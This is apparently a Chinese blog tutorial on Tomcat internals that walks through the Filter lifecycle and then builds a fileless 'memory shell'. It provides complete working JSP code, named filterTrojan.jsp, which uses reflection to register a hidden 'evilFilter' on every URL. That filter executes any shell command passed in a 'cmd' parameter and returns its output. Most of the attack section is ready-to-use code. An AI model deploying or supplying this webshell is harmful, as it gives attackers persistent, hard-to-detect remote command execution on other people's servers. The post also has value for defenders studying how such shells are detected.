『Java安全』Tomcat内存马_动态注册Filter内存马

已于 2022-03-29 20:47:59 修改
阅读量1.5k 收藏 3
点赞数
分类专栏: # Java内存马基础 文章标签: java安全 内存马 tomcat filter 容器安全
于 2022-03-23 16:05:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/123561053
版权

文章目录

前言

Filter生命周期

在这里插入图片描述

Filter类介绍

在这里插入图片描述

Servlet启动流程

下图是Servlet启动流程
在这里插入图片描述
StandardEngine启动后调用StandardHost、再调用StandardContext。在StandardContext.startInternal()中可以看到,加载流程是Listener-Filter-Servlet
在这里插入图片描述
在这里插入图片描述

Filter调用流程分析

来到StandardWrapper处理Filter事务
在这里插入图片描述
借用宽字节安全的图
在这里插入图片描述

1. 从Standardcontext获取filterMaps

ApplicationFilterFactory中从Standardcontext获取filterMaps
在这里插入图片描述
里面有每个filter的信息
在这里插入图片描述

2. 遍历filterMap匹配url并调用了addFilter方法添加到filterChain

符合匹配就从filterConfig添加filter到filterChain,这里调用了addFilter方法
在这里插入图片描述
filterConfig存储了filterDef定义和filter信息
在这里插入图片描述

3. 依次调用doFilter

ApplicationFilterFactory获取完filterChain后回到StandardWarpper继续处理,然后就是调用链子filterChain.doFilter方法
在这里插入图片描述
实际调用了internalDoFilter方法
在这里插入图片描述
循环chain依次调用各filter的doFilter方法
在这里插入图片描述
当最后一个filter结束后
在这里插入图片描述

Filter内存马

原理

由于不能直接操控web.xml或者WebFilter注解注册恶意Filter

但是根据流程分析:注册Filter用到了几个关键方法,这就可以通过反射注册恶意Filter

模拟正常流程:

  1. 生成恶意filter
  2. filterDef封装filter添加到filterDefs
  3. filterConfig封装filterDefs添加到filterConfigs
  4. 生成filterMap添加到filterMaps
  5. 三者放入Context

Ⅰ. 获取context

Servlet提供了一个方法request.getSession().getServletContext()获取servletContext

这里获取到的是ApplicationContextFacade,它封装了ApplicationContext实现了ServletContext接口

然后ApplicationContext封装了StandardContext

在这里插入图片描述
因此调两次反射就能拿到StandardContext,注意是private要setAccessible

<%
    Field appContextField = ApplicationContextFacade.class.getDeclaredField("context");
    appContextField.setAccessible(true);
    Field standardContextField = ApplicationContext.class.getDeclaredField("context");
    standardContextField.setAccessible(true);

    ServletContext servletContext = request.getSession().getServletContext();
    ApplicationContext applicationContext = (ApplicationContext) appContextField.get(servletContext);
    StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);

%>
更简单的方法

Servlet环境的request实际是RequestFacade对象,就像Context实际也是ApplicationCotextFacade一样
在这里插入图片描述

它有一个request属性存储了Request对象,Request对象getter就能直接拿到Context

    Field requestField = request.getClass().getDeclaredField("request");
    requestField.setAccessible(true);
    Request request1 = (Request) requestField.get(request);
    StandardContext standardContext = (StandardContext) request1.getContext();

Ⅱ. 生成恶意Filter用FilterDef封装添加到FilterDefs

FilterDef提供了setter
在这里插入图片描述
StandardContext也提供了添加FilterDefs的方法
在这里插入图片描述

.......
    Filter filter = new Filter() {
        @Override
        public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws ServletException, IOException {
            if (request.getParameter("cmd") != null) {
                boolean isLinux = true;
                String osTyp = System.getProperty("os.name");
                if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                    isLinux = false;
                }
                String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")};
                InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                Scanner s = new Scanner(in).useDelimiter("\\A");
                String output = s.hasNext() ? s.next() : "";
                response.getWriter().write(output);
                response.getWriter().flush();
            }
            chain.doFilter(request, response);
        }

    };
    FilterDef filterDef = new FilterDef();
    filterDef.setFilter(filter);
    filterDef.setFilterName("evilFilter");
    filterDef.setFilterClass(filter.getClass().getName());
    standardContext.addFilterDef(filterDef);
%>

Ⅲ. 用filterConfig封装filterDefs添加到filterConfigs

生成filterConfig需要调用反射,因为构造器没有声明public,然后直接向filterConfigs调用Map.put传入即可,键为filter的名称同上

这里的Context是org.apache.catalina.Context

......
    Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
    constructor.setAccessible(true);
    ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);

    Field filterConfigsField = StandardContext.class.getDeclaredField("filterConfigs");
    filterConfigsField.setAccessible(true);
    Map filterConfigs = (Map) filterConfigsField.get(standardContext);
    filterConfigs.put("evilFilter", filterConfig);
%>

Ⅳ. 生成filterMap添加到filterMaps

FilterMap也有几个add和set方法,这里需要设定名称、pattern,dispatcher设置为DispatcherType.REQUEST

FilterMaps提供了两种add方法来添加map,选用before可以加在最前面
在这里插入图片描述

......
    FilterMap filterMap = new FilterMap();
    filterMap.addURLPattern("/*");
    filterMap.setFilterName("evilFilter");
    filterMap.setDispatcher(DispatcherType.REQUEST.name());
    standardContext.addFilterMapBefore(filterMap);
%>

完整代码

// filterTrojan.jsp
<%@ page import="java.lang.reflect.Field" %>
<%@ page import="org.apache.catalina.core.ApplicationContext" %>
<%@ page import="org.apache.catalina.core.StandardContext" %>
<%@ page import="org.apache.catalina.core.ApplicationContextFacade" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterDef" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.io.InputStream" %>
<%@ page import="java.util.Scanner" %>
<%@ page import="java.util.Map" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="org.apache.catalina.core.ApplicationFilterConfig" %>
<%@ page import="org.apache.catalina.Context" %>
<%@ page import="org.apache.tomcat.util.descriptor.web.FilterMap" %>
<%@ page contentType="text/html;charset=UTF-8" language="java" %>

<%
    Field appContextField = ApplicationContextFacade.class.getDeclaredField("context");
    appContextField.setAccessible(true);
    Field standardContextField = ApplicationContext.class.getDeclaredField("context");
    standardContextField.setAccessible(true);

    ServletContext servletContext = request.getSession().getServletContext();
    ApplicationContext applicationContext = (ApplicationContext) appContextField.get(servletContext);
    StandardContext standardContext = (StandardContext) standardContextField.get(applicationContext);

    Filter filter = new Filter() {
        @Override
        public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws ServletException, IOException {
            if (request.getParameter("cmd") != null) {
                boolean isLinux = true;
                String osTyp = System.getProperty("os.name");
                if (osTyp != null && osTyp.toLowerCase().contains("win")) {
                    isLinux = false;
                }
                String[] cmds = isLinux ? new String[]{"sh", "-c", request.getParameter("cmd")} : new String[]{"cmd.exe", "/c", request.getParameter("cmd")};
                InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                Scanner s = new Scanner(in).useDelimiter("\\A");
                String output = s.hasNext() ? s.next() : "";
                response.getWriter().write(output);
                response.getWriter().flush();
            }
            chain.doFilter(request, response);
        }

    };
    FilterDef filterDef = new FilterDef();
    filterDef.setFilter(filter);
    filterDef.setFilterName("evilFilter");
    filterDef.setFilterClass(filter.getClass().getName());
    standardContext.addFilterDef(filterDef);

    Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, FilterDef.class);
    constructor.setAccessible(true);
    ApplicationFilterConfig filterConfig = (ApplicationFilterConfig) constructor.newInstance(standardContext, filterDef);

    Field filterConfigsField = StandardContext.class.getDeclaredField("filterConfigs");
    filterConfigsField.setAccessible(true);
    Map filterConfigs = (Map) filterConfigsField.get(standardContext);
    filterConfigs.put("evilFilter", filterConfig);

    FilterMap filterMap = new FilterMap();
    filterMap.addURLPattern("/*");
    filterMap.setFilterName("evilFilter");
    filterMap.setDispatcher(DispatcherType.REQUEST.name());
    standardContext.addFilterMapBefore(filterMap);

    out.println("Inject done");
%>

运行截图

首先访问注入内存马的jsp,然后只要urlPattern符合都能进行RCE
在这里插入图片描述

参考引用

Tomcat Filter类型内存马与查杀技术学习
【干货】Servlet内存马加载流程分析
Filter内存马浅析

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123561053
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat监控工具Probe,支持tomcat6-7-8-9.zip
12-12
Tomcat监控工具Probe 1.Porbe介绍 psi-probe用于对Tomcat进行监控,比tomcat的manager强大很多。 ...probe-2.3.3.zip 或者 probe.war ...3.将下载好的war包,或者zip... Quick check:快速检测tomcat的数据源、内存
Java安全Tomcat内存_动态注册Listener内存
Ho1aAs‘s Blog
03-24 1795
Java安全』反序列化- 文章目录前言Tomcat Servlet API Listener介绍ServletRequestListener介绍ServletRequestListener调用流程分析1. Request创建时2. Request销毁时Listener内存原理Ⅰ.获取contextⅡ. 生成恶意Listener获取ResponseⅢ. add添加listener完整代码参考引用完 前言 Tomcat Servlet API Listener介绍 Listener监听器用来监听对象创建、销
tomcat filter
huyangyamin的专栏
11-21 435
tomcat中的一个应用配置的filter,如下 <filter> <filter-name>Set Character Encoding</filter-name> <filter-class>org.apache.catalina.filters.SetCharacterEncodingFilter</filter-class> <init-
【Servlet3.0新特性】第02节_Servlet的动态注册以及使用注解编写监听器和过滤器
半步多
06-24 1906
完整版见https://jadyer.github.io/2013/06/24/servlet30-new-feature/
[Java安全]—Tomcat Filter内存
Sentiment的博客
07-17 3432
Servlet 有自己的过滤器filter,可以通过自定义的过滤器,来对用户的请求进行拦截等操作。经过 filter 之后才会到 Servlet ,那么如果我们动态创建一个 filter 并且将其放在最前面,我们的 filter 就会最先执行,当我们在 filter 中添加恶意代码,就会进行命令执行,这样也就成为了一个内存 Webshell,所以就需要我们想办法在最前方注册一个恶意的filter并执行。先看一个正常的demofilter.java 运行后成功触发之后再看几个会用到的类:接下来我们来分析一下
动态注册(servlet、filter、listener)
weixin_44395717的博客
05-20 679
利用ServletContextListener的监听器在服务器启动时加载,去动态注册servlet、filter、listener package com._14_dynamicRegiste; import javax.servlet.*; import javax.servlet.annotation.WebListener; import java.util.EnumSet; impor...
Java-web旅游项目实战案例(四个)IDEA项目源码
08-15
Java-web旅游项目实战案例(四个)IDEA项目源码; 4 技术选型 4.1 Web层 a) Servlet:前端控制器 b) html:视图 c) Filter:过滤器 d) BeanUtils:数据封装 e) Jackson:json序列化工具 4.2 Service层 f) Javamail:...
java head space.txt
10-12
以下的问题是由于java的堆内存已满,需要java运行时加大java的堆内存空间 2019-10-09 18:02:32.858 [http-nio-8239-exec-6] ERROR c.a.b.c.exceptionHandler.CodeBaseExceptionHandler:69 - Handler dispatch failed...
Java面试宝典2020修订版V1.0.1.doc
05-21
43、什么是java内存泄漏,怎么预防? 85 七、框架部分 85 1、谈谈你对Struts2的理解。 85 2、谈谈你对Hibernate的理解。 86 3、你对Spring的理解。 87 4、Struts2优缺点 87 5、ORM工作原理? 89 6、struts2的核心...
Java项目:学生选课管理系统(java+Servlet+JSP+JavaScript+Mysql)
07-09
项目介绍 学生选课系统,有学生...3.tomcat环境:Tomcat 7.x,8.x,9.x版本均可 4.硬件环境:windows 7/8/10 1G内存以上;或者 Mac OS; 5.数据库:MySql 5.7版本; 6.是否Maven项目: 否;查看源码目录中是否包含pom.xm
Java内存学习--Filter内存
zyer
08-04 895
Filter内存,入门级
动态配置过滤器java_Java Web之路一:过滤器(Filter
weixin_39622905的博客
02-27 712
一、过滤器(Filter)简介过滤器是对web资源进行拦截,做一些处理后再交给下一个过滤器或Servlet处理,主要可以拦截request和response过滤器是以一种组件的形式与web程序绑定,采用链式进行工作。过滤器的好处:可以拦截请求和响应,以便查看或者获取客户端与服务器之间的交互数据,实现过滤的功能。另外过滤器可以动态的添加或删除而不需要修改web程序的逻辑。过滤器的初始化和销毁都是通过...
Java内存-Tomcat
mole_exp的博客
04-20 763
Java安全_内存-Tomcat
Tomcat对Servlet规范的Filter及Listener实现
m0_70109670的博客
05-09 190
StandardWrapperValve的invoke就三步: 创建Servlet实例 给当前请求创建一个Filter链 调用Filter链 [](()为何要给每个请求创建Filter链 每个请求的请求路径不同,而Filter都有相应路径映射,因此不是所有Filter都需要处理当前请求,要根据请求路径选择特定的一些Filter。 [](()为何没调用Servlet#service Filter链的最后一个Filter会负责调用Servlet。 [](()Filter管理 ==========
java-tomcat-filter内存
12-31 736
java内存
TemplatesImpl利用链与Fastjson注入内存
weixin_42508548的博客
01-31 881
TemplatesImpl利用链是一个非常重要的东西,要知道,CC链可以用它,CB链也用它,注入内存还是用它。因为它可以加载java字节码并实例化。ClassLoader,类加载器,是JVM执行类加载机制的前提,其主要任务为根据一个类的全限定名来读取此类的二进制字节流到JVM内部,然后转换为一个与目标类对应的java.lang.Class对象实例。文章第四部分,了解了实例化类的时候,会自动执行static{}代码块,{}代码块,无参构造方法那么如何注入内存呢,也是通过newInstance实现。
[Java安全]—再探Filter内存
Sentiment的博客
12-03 486
关于tomcat反序列化注入回显内存问题中,就是通过filter内存进行反序列化动态注册的,但filter内存由于当时学的时候就没有学的很明白,所以打算重新回顾一下。Tomcat中有四种类型的Servlet容器,从上到下分别是 Engine、Host、Context、Wrapper他们之间也就是一种父子关系:Servlet 有自己的过滤器filter,可以通过自定义的过滤器,来对用户的请求进行拦截等操作。经过 filter 之后才会到 Servlet ,那么如果我们动态创建一个 filter 并且将其
java tomcat内存学习
springgold的博客
01-21 704
1.tomcat 1.tomcat 结构 --Server 顶层容器--Service 提供具体服务的--Connector--Container--Engine--Host--Context--Wrapper--Service Server: 一个Tomcat仅有一个Server,指代整个Web服务器。Connect...
[Java安全]—Tomcat反序列化注入回显内存
Sentiment的博客
12-03 953
在之前学的tomcat filter、listener、servlet等内存中,其实并不算真正意义上的内存,因为Web服务器在编译jsp文件时生成了对应的class文件,因此进行了文件落地。所以本篇主要是针对于反序列化进行内存注入来达到无文件落地的目的,而的和可以直接获取,但是反序列化的时候却不能,所以回显问题便需要考虑其中。既然无法直接获取request和response变量,所以就需要找一个存储请求信息的变量,根据kingkk师傅的思路,在中找到了: 并且这两个变量是静态的,因此省去了获取对象实例
snoop filter
最新发布
04-30
Snoop Filter是一种缓存技术,可以提高CPU对内存访问的效率。它是在多处理器系统中使用的一种缓存一致性技术。Snoop Filter作为缓存控制的一种硬件实现方式,可以检测到一些指向主内存的写操作,从而实现缓存的一致性。当有一个CPU进行数据更新操作时,Snoop Filter会通知其它CPU的缓存块失效,这样其它CPU就能够重新读取主内存中的数据,保证数据的一致性。 Snoop Filter还能对缓存读操作进行过滤,从而减少缓存的读延迟。当一个CPU发起读操作,Snoop Filter会检查所有其它CPU的缓存状态,并提供一个可靠的结果,从而减少CPU等待结果的时间。 总的来说,Snoop Filter可以减少CPU对主内存的访问次数,提高CPU对内存的访问效率。在多处理器架构中,Snoop Filter是一种非常有效的缓存管理技术,能够充分利用硬件资源,提高系统的运行速度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值